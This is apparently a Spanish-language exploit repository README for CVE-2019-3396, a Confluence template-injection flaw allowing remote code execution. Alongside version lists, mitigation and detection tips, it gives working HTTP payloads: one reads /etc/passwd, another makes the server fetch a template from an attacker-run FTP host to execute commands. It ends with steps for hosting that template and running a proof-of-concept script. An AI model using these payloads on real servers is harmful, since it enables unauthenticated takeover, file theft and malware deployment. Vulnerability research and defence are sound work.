CVE-2019-3396
CVE-2019-3396 confluence SSTI RCE
🔎 ¿Qué es CVE-2019-3396?
- Un error crítico de Confluence (Atlassian).
- Tipo: Inyección de Plantillas + Path Traversal.
- Riesgo: Ejecución Remota de Código (RCE) sin inicio de sesión.
- Estado: Explotado activamente.
🛑 Versiones Afectadas
- 6.6.0 → 6.6.11 ❌ vulnerable
- 6.6.12 ✅ corregido
- 6.12.0 → 6.12.2 ❌ vulnerable
- 6.12.3 ✅ corregido
- 6.13.0 → 6.13.2 ❌ vulnerable
- 6.13.3 ✅ corregido
- 6.14.0 → 6.14.1 ❌ vulnerable
- 6.14.2 ✅ corregido
👉 Siempre consulta el aviso oficial de Atlassian para más detalles.
💥 Impacto
- Toma de control total del servidor
- Robo de datos, ransomware, criptomineros
- Los atacantes pueden ejecutar cualquier código que deseen
🔐 Mitigación
- ✅ Actualizar a la versión parcheada de Confluence (mejor solución)
- 🚫 Deshabilitar la macro Widget Connector si no puedes parchear de inmediato
- 🔒 Limitar el acceso (solo interno hasta que se corrija)
👀 Detección (consejos seguros)
- Revisa los registros en busca de solicitudes extrañas a los endpoints de macro/preview
- Busca procesos extraños o tráfico saliente
- Usa escáneres de vulnerabilidades para confirmar la versión
📂 Leer Archivo
POST /rest/tinymce/1/macro/preview HTTP/2
Host: {***}
{"macro":{"params":{"_template":"file:///etc/passwd"}}}
Ejecutar Comando
POST /rest/tinymce/1/macro/preview HTTP/2
Host: ***
{"contentId":"1","macro":{"name":"widget","params":{"_template":"ftp://***:8888/cmd.vm","command":"id"},"body":""}}
Automatización
- sube cmd.vm a tu VPS
- usa FTP o HTTPS para crear un enlace a este archivo cmd.vm mediante
pip install pyftpdlib
python -m pyftpdlib -p 8888
- actualiza el archivo poc.py con el nuevo valor para pyftp = "ftp://10.100.10.100:8888/cmd.vm"
python poc.py <url> <cmd>
python poc.py https://ip:port "id"
⚠️ CONSEJO — este repositorio es solo con fines educativos, defensivos y de concienciación.
🔗 Referencias